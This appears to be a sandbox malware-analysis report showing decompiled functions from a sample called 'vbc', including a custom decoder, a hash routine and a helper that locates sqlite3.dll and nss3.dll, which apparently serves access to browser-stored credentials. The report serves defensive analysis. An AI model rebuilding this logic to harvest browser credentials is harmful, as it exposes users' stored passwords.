                                                                                                                                                    0x0040a27c
                                                                                                                                                    0x0040a27c
                                                                                                                                                    0x0040a17f
                                                                                                                                                    0x0040a181
                                                                                                                                                    0x0040a188
                                                                                                                                                    0x0040a18b
                                                                                                                                                    0x0040a18e
                                                                                                                                                    0x0040a1f2
                                                                                                                                                    0x0040a1f2
                                                                                                                                                    0x0040a1f4
                                                                                                                                                    0x0040a1fa
                                                                                                                                                    0x0040a1fd
                                                                                                                                                    0x0040a255
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a256
                                                                                                                                                    0x0040a1ff
                                                                                                                                                    0x0040a1ff
                                                                                                                                                    0x0040a201
                                                                                                                                                    0x0040a21f
                                                                                                                                                    0x0040a224
                                                                                                                                                    0x0040a229
                                                                                                                                                    0x0040a22f
                                                                                                                                                    0x0040a235
                                                                                                                                                    0x0040a23e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a23e
                                                                                                                                                    0x0040a231
                                                                                                                                                    0x0040a233
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a241
                                                                                                                                                    0x0040a241
                                                                                                                                                    0x0040a247
                                                                                                                                                    0x0040a24a
                                                                                                                                                    0x0040a24d
                                                                                                                                                    0x0040a24d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a201
                                                                                                                                                    0x0040a190
                                                                                                                                                    0x0040a190
                                                                                                                                                    0x0040a192
                                                                                                                                                    0x0040a198
                                                                                                                                                    0x0040a19c
                                                                                                                                                    0x0040a19f
                                                                                                                                                    0x0040a1a0
                                                                                                                                                    0x0040a1a5
                                                                                                                                                    0x0040a1a8
                                                                                                                                                    0x0040a1ae
                                                                                                                                                    0x0040a1b2
                                                                                                                                                    0x0040a1b3
                                                                                                                                                    0x0040a1b8
                                                                                                                                                    0x0040a1bb
                                                                                                                                                    0x0040a1bf
                                                                                                                                                    0x0040a1c5
                                                                                                                                                    0x0040a1ce
                                                                                                                                                    0x0040a1d1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a1d1
                                                                                                                                                    0x0040a1c1
                                                                                                                                                    0x0040a1c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a1d8
                                                                                                                                                    0x0040a1d8
                                                                                                                                                    0x0040a1de
                                                                                                                                                    0x0040a1e1
                                                                                                                                                    0x0040a1e4
                                                                                                                                                    0x0040a1e4
                                                                                                                                                    0x0040a1ec
                                                                                                                                                    0x0040a1f0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                                                                                                      • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                                                                                                    • strlen.MSVCRT ref: 0040A13F
                                                                                                                                                    • atoi.MSVCRT ref: 0040A14D
                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4107816708-0
                                                                                                                                                    • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                                                                                    • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                                                                                                    • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                                                                                    • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410E8A Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00410E8A(char* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t37;
				char* _t56;
				signed char _t57;
				char* _t67;
				void* _t68;
				void* _t69;

				_t68 = __edi;
				_t56 = __eax;
				_t69 = 0;
				_t37 = strlen(__eax) + 0xfffffffd;
				_v16 = _t37;
				if(_t37 < 0) {
					L18:
					 *((char*)(_t69 + _t68)) = 0;
					return _t69;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - _t56;
				_t5 = _t56 + 2; // 0x411004
				_t67 = _t5;
				while(1) {
					_t6 = _t67 - 2; // 0x75fff88b
					_t39 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E00410E56(_t39);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t67 - 1; // 0xfc75fff8
					_t41 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E00410E56(_t41);
					} else {
						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {
						_t57 = E00410E56(_t43);
					} else {
						_t57 = 0x3e;
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
						_v7 = E00410E56(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t67 == 0x2d) {
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t67 + 1)) == 0x2d) {
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;
				_t31 = _t69 + 1; // 0x1
				return _t31;
			}














                                                                                                                                                    0x00410e8a
                                                                                                                                                    0x00410e92
                                                                                                                                                    0x00410e95
                                                                                                                                                    0x00410e9c
                                                                                                                                                    0x00410ea0
                                                                                                                                                    0x00410ea3
                                                                                                                                                    0x00410f5b
                                                                                                                                                    0x00410f5b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410f5f
                                                                                                                                                    0x00410ea9
                                                                                                                                                    0x00410eb0
                                                                                                                                                    0x00410eb3
                                                                                                                                                    0x00410eb3
                                                                                                                                                    0x00410eb6
                                                                                                                                                    0x00410eb6
                                                                                                                                                    0x00410eb6
                                                                                                                                                    0x00410ebb
                                                                                                                                                    0x00410ec8
                                                                                                                                                    0x00410ebd
                                                                                                                                                    0x00410ebd
                                                                                                                                                    0x00410ebd
                                                                                                                                                    0x00410ecb
                                                                                                                                                    0x00410ecb
                                                                                                                                                    0x00410ed0
                                                                                                                                                    0x00410edd
                                                                                                                                                    0x00410ed2
                                                                                                                                                    0x00410ed2
                                                                                                                                                    0x00410ed2
                                                                                                                                                    0x00410ee0
                                                                                                                                                    0x00410ee4
                                                                                                                                                    0x00410eef
                                                                                                                                                    0x00410ee6
                                                                                                                                                    0x00410ee6
                                                                                                                                                    0x00410ee6
                                                                                                                                                    0x00410ef1
                                                                                                                                                    0x00410ef6
                                                                                                                                                    0x00410f03
                                                                                                                                                    0x00410ef8
                                                                                                                                                    0x00410ef8
                                                                                                                                                    0x00410ef8
                                                                                                                                                    0x00410f14
                                                                                                                                                    0x00410f1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410f29
                                                                                                                                                    0x00410f31
                                                                                                                                                    0x00410f6f
                                                                                                                                                    0x00410f74
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410f74
                                                                                                                                                    0x00410f39
                                                                                                                                                    0x00410f3c
                                                                                                                                                    0x00410f40
                                                                                                                                                    0x00410f43
                                                                                                                                                    0x00410f4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410f4b
                                                                                                                                                    0x00410f65
                                                                                                                                                    0x00410f6a
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen
                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                    • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                                                                                    • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                                                                                                    • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                                                                                    • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BC6D Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                    			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BD8A(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BD8A(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                                                                                                                                    0x0040bc72
                                                                                                                                                    0x0040bc74
                                                                                                                                                    0x0040bc76
                                                                                                                                                    0x0040bc79
                                                                                                                                                    0x0040bc7f
                                                                                                                                                    0x0040bc82
                                                                                                                                                    0x0040bc84
                                                                                                                                                    0x0040bc84
                                                                                                                                                    0x0040bc8c
                                                                                                                                                    0x0040bc92
                                                                                                                                                    0x0040bc95
                                                                                                                                                    0x0040bcc7
                                                                                                                                                    0x0040bcca
                                                                                                                                                    0x0040bcce
                                                                                                                                                    0x0040bcd1
                                                                                                                                                    0x0040bcda
                                                                                                                                                    0x0040bcdf
                                                                                                                                                    0x0040bce7
                                                                                                                                                    0x0040bcec
                                                                                                                                                    0x0040bcf0
                                                                                                                                                    0x0040bcf3
                                                                                                                                                    0x0040bcf3
                                                                                                                                                    0x0040bcd1
                                                                                                                                                    0x0040bcf6
                                                                                                                                                    0x0040bcf7
                                                                                                                                                    0x0040bcfd
                                                                                                                                                    0x0040bc97
                                                                                                                                                    0x0040bc99
                                                                                                                                                    0x0040bc9a
                                                                                                                                                    0x0040bc9e
                                                                                                                                                    0x0040bca2
                                                                                                                                                    0x0040bcb0
                                                                                                                                                    0x0040bcb5
                                                                                                                                                    0x0040bcbd
                                                                                                                                                    0x0040bcc2
                                                                                                                                                    0x0040bcc5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bca4
                                                                                                                                                    0x0040bca4
                                                                                                                                                    0x0040bca5
                                                                                                                                                    0x0040bca8
                                                                                                                                                    0x0040bca8
                                                                                                                                                    0x0040bca2
                                                                                                                                                    0x0040bd0a

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                    • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                                                                                    • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                                                                                                                    • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                                                                                    • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406F6F Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L004115D0();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L004115D6();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                                                    0x00406f6f
                                                                                                                                                    0x00406f70
                                                                                                                                                    0x00406f70
                                                                                                                                                    0x00406f73
                                                                                                                                                    0x00406f77
                                                                                                                                                    0x00406f8a
                                                                                                                                                    0x00406f8a
                                                                                                                                                    0x00406f8e
                                                                                                                                                    0x00406f90
                                                                                                                                                    0x00406f96
                                                                                                                                                    0x00406f97
                                                                                                                                                    0x00406f9a
                                                                                                                                                    0x00406fa3
                                                                                                                                                    0x00406fa4
                                                                                                                                                    0x00406fa9
                                                                                                                                                    0x00406fb3
                                                                                                                                                    0x00406fb5
                                                                                                                                                    0x00406fba
                                                                                                                                                    0x00406fc1
                                                                                                                                                    0x00406fcb
                                                                                                                                                    0x00406fcd
                                                                                                                                                    0x00406fce
                                                                                                                                                    0x00406fd3
                                                                                                                                                    0x00406fda
                                                                                                                                                    0x00406fe3
                                                                                                                                                    0x00406f79
                                                                                                                                                    0x00406f79
                                                                                                                                                    0x00406f7b
                                                                                                                                                    0x00406f7d
                                                                                                                                                    0x00406f82
                                                                                                                                                    0x00406f83
                                                                                                                                                    0x00406f86
                                                                                                                                                    0x00406f88
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406f88
                                                                                                                                                    0x00406ff3
                                                                                                                                                    0x00406ff6
                                                                                                                                                    0x00406fff
                                                                                                                                                    0x00406fff
                                                                                                                                                    0x00406fe8
                                                                                                                                                    0x00406fec

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                    • Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                                                                                                                    • Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
                                                                                                                                                    • Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                                                                                                                    • Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EFAE Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v304;
				char* _t18;
				char* _t22;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040EF36;
					_v16 = __esi;
					__imp__SHBrowseForFolderA(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v304;
						__imp__SHGetPathFromIDListA(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							strcpy(__esi,  &_v304);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                                                    0x0040efb8
                                                                                                                                                    0x0040efbc
                                                                                                                                                    0x0040efbe
                                                                                                                                                    0x0040efc6
                                                                                                                                                    0x0040efcb
                                                                                                                                                    0x0040efd1
                                                                                                                                                    0x0040efd5
                                                                                                                                                    0x0040efd9
                                                                                                                                                    0x0040efdc
                                                                                                                                                    0x0040efdf
                                                                                                                                                    0x0040efe6
                                                                                                                                                    0x0040efed
                                                                                                                                                    0x0040eff0
                                                                                                                                                    0x0040eff6
                                                                                                                                                    0x0040effa
                                                                                                                                                    0x0040effc
                                                                                                                                                    0x0040f004
                                                                                                                                                    0x0040f00c
                                                                                                                                                    0x0040f016
                                                                                                                                                    0x0040f017
                                                                                                                                                    0x0040f01d
                                                                                                                                                    0x0040f01e
                                                                                                                                                    0x0040f025
                                                                                                                                                    0x0040f028
                                                                                                                                                    0x0040f02e
                                                                                                                                                    0x0040f02e
                                                                                                                                                    0x0040f031
                                                                                                                                                    0x0040f036

                                                                                                                                                    APIs
                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 0040EFBE
                                                                                                                                                    • SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
                                                                                                                                                    • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 0040F017
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathstrcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 409945605-0
                                                                                                                                                    • Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                                                                                    • Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
                                                                                                                                                    • Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                                                                                    • Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A437 Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E0040A437(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E004078FF(_t25));
				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E004078FF(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                                                                                                                                    0x0040a437
                                                                                                                                                    0x0040a44c
                                                                                                                                                    0x0040a44f
                                                                                                                                                    0x0040a45d
                                                                                                                                                    0x0040a46d
                                                                                                                                                    0x0040a474
                                                                                                                                                    0x0040a476
                                                                                                                                                    0x0040a479
                                                                                                                                                    0x0040a487
                                                                                                                                                    0x0040a49a
                                                                                                                                                    0x0040a49f
                                                                                                                                                    0x0040a4aa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a4c0
                                                                                                                                                    0x0040a4c7

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                                                                    • sprintf.MSVCRT ref: 0040A45D
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A4C0
                                                                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                                                                    • sprintf.MSVCRT ref: 0040A487
                                                                                                                                                    • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 919693953-0
                                                                                                                                                    • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                                                                                    • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                                                                                                    • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                                                                                    • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F3BA Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E0040F3BA(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen("sqlite3.dll") + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _a4, "sqlite3.dll");
				}
				_t16 = E0040614B( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}







                                                                                                                                                    0x0040f3d5
                                                                                                                                                    0x0040f3dc
                                                                                                                                                    0x0040f3e4
                                                                                                                                                    0x0040f3f6
                                                                                                                                                    0x0040f3ff
                                                                                                                                                    0x0040f414
                                                                                                                                                    0x0040f401
                                                                                                                                                    0x0040f40b
                                                                                                                                                    0x0040f411
                                                                                                                                                    0x0040f422
                                                                                                                                                    0x0040f42b
                                                                                                                                                    0x0040f432

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F3DC
                                                                                                                                                    • strlen.MSVCRT ref: 0040F3E4
                                                                                                                                                    • strlen.MSVCRT ref: 0040F3F1
                                                                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen$memsetstrcatstrcpy
                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                    • API String ID: 1581230619-1155512374
                                                                                                                                                    • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                                                                                    • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                                                                                                                    • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                                                                                    • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

